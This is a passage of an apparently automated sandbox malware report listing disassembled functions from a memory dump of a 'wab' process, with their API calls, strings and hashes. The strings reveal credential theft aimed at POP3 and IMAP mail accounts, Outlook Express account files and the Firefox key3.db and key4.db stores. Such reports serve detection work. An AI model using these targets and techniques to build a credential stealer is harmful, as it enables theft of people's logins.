                                                                                                                • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                                • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                • sprintf.MSVCRT ref: 0040A921
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                • API String ID: 1631269929-4153097237
                                                                                                                • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040810E
                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,7508EB20,?), ref: 004081B9
                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                • API String ID: 524865279-2190619648
                                                                                                                • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                                • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                                • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                • String ID: key3.db$key4.db
                                                                                                                • API String ID: 581844971-3557030128
                                                                                                                • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 2300387033-3849865405
                                                                                                                • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpystrlen$memsetsprintf
                                                                                                                • String ID: %s (%s)
                                                                                                                • API String ID: 3756086014-1363028141
                                                                                                                • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscat$memsetsprintf
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 125969286-791839006
                                                                                                                • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                  • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                                                                                                  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                • String ID: ACD
                                                                                                                • API String ID: 1886237854-620537770
                                                                                                                • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                                                                                • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                                                                                • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004091EC
                                                                                                                • sprintf.MSVCRT ref: 00409201
                                                                                                                  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                  • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                • String ID: caption$dialog_%d
                                                                                                                • API String ID: 2923679083-4161923789
                                                                                                                • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                • unknown error, xrefs: 004277B2
                                                                                                                • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                • no such savepoint: %s, xrefs: 00426A02
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                • API String ID: 3510742995-3035234601
                                                                                                                • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                • API String ID: 2221118986-3608744896
                                                                                                                • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memcpy.MSVCRT ref: 00442A5E
                                                                                                                  • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmpmemcpy
                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                • API String ID: 1784268899-4153596280
                                                                                                                • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                • memset.MSVCRT ref: 00410246
                                                                                                                • memset.MSVCRT ref: 00410258
                                                                                                                  • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                                                                                                • memset.MSVCRT ref: 0041033F
                                                                                                                • _mbscpy.MSVCRT ref: 00410364
                                                                                                                • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974772901-0
                                                                                                                • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 0044406C
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                • strlen.MSVCRT ref: 004440D1
                                                                                                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                                                                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                • memcpy.MSVCRT ref: 004440EB
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 577244452-0
                                                                                                                • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                                                                                • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                                                                                • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                                                • _strcmpi.MSVCRT ref: 00404518
                                                                                                                • _strcmpi.MSVCRT ref: 00404536
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strcmpi$memcpystrlen
                                                                                                                • String ID: imap$pop3$smtp
                                                                                                                • API String ID: 2025310588-821077329
                                                                                                                • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040C02D
                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                                                                                                  • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                • API String ID: 2726666094-3614832568
                                                                                                                • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403A88
                                                                                                                • memset.MSVCRT ref: 00403AA1
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                • strlen.MSVCRT ref: 00403AE9
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1786725549-0
                                                                                                                • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014771361-0
                                                                                                                • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memcmp.MSVCRT ref: 00406151
                                                                                                                  • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
